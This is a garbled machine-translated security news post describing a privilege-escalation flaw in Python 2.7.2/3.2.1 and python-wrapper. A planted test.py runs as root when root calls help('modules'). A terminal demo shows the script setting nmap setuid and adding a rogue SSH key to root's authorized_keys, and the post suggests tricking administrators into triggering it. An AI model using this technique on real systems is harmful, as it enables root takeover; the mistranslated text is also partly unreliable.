The latest python elevation: untrusted search path/code execution vulnerability in python-wrapper and python

Exploit-db.com has recently exploded a strange vulnerability. As long as the root user is tempted to execute the help ('modules') command in the current directory through python or python-wrapper, the background will execute the test. py script in this directory with the root permission.
/// Adalia is a common user. The following shows the permissions and script content of test. py. One of the script content is chmod 4755/usr/bin/nmap. Add nmap as 4755 permission, which means that nmap is executed with the nmap owner permission during nmap execution, that is, normal users can use the root permission to execute nmap
/// The nmap permission is rwx,
Adalia @ bukkit :~ /Security/pythonwrapper> ls-hl/usr/bin/nmap
-Rwxr-xr-x 1 root 1.4 M Oct 29 2011/usr/bin/nmap
/// Before the attack/root/. ssh/authorized_keys does not exist
Bukkit:/home/adalia/security/pythonwrapper # ls/root/. ssh/authorized_keys
Ls: cannot access/root/. ssh/authorized_keys: No such file or directory
/// Attack start: Run python with bukkit (root permission)
Adalia @ bukkit :~ /Security/pythonwrapper> su
Password: www.2cto.com
Bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> Help ('modules ')
Please wait a moment while I gather a list of all available modules...
... The specific module is omitted here...
>>> Exit ()
/// After some examples of modules, the nmap permission is changed to rws. It can also be executed with the owen permission of nmap. The original/root/. ssh/authorized_keys file does not exist.
Bukkit:/home/adalia/security/pythonwrapper # ls-hl/usr/bin/nmap
-Rwsr-xr-x 1 root 1.4 M Oct 29 2011/usr/bin/nmap
Bukkit:/home/adalia/security/pythonwrapper # cat/root/. ssh/authorized_keys
Ssh-rsa rogueclown washere
The vulnerability discoverer also provides a scenario to trick the Administrator into running help ('Les les '). In the webhosting environment, the Administrator is asked to help debug some modules, list the modules installed in the webhosting environment. Then the Administrator waits until the user directory starts running help ('modules.
Affected:
Version: python 2.7.2 and python 3.2.1
Python untrusted search path/code execution vulnerability:
Http://www.exploit-id.com/local-exploits/python-untrusted-search-pathcode-execution-vulnerability
Python-wrapper untrusted search path/code execution vulnerability:
Http://www.exploit-db.com/exploits/19523/
 
From: FreebuF. COM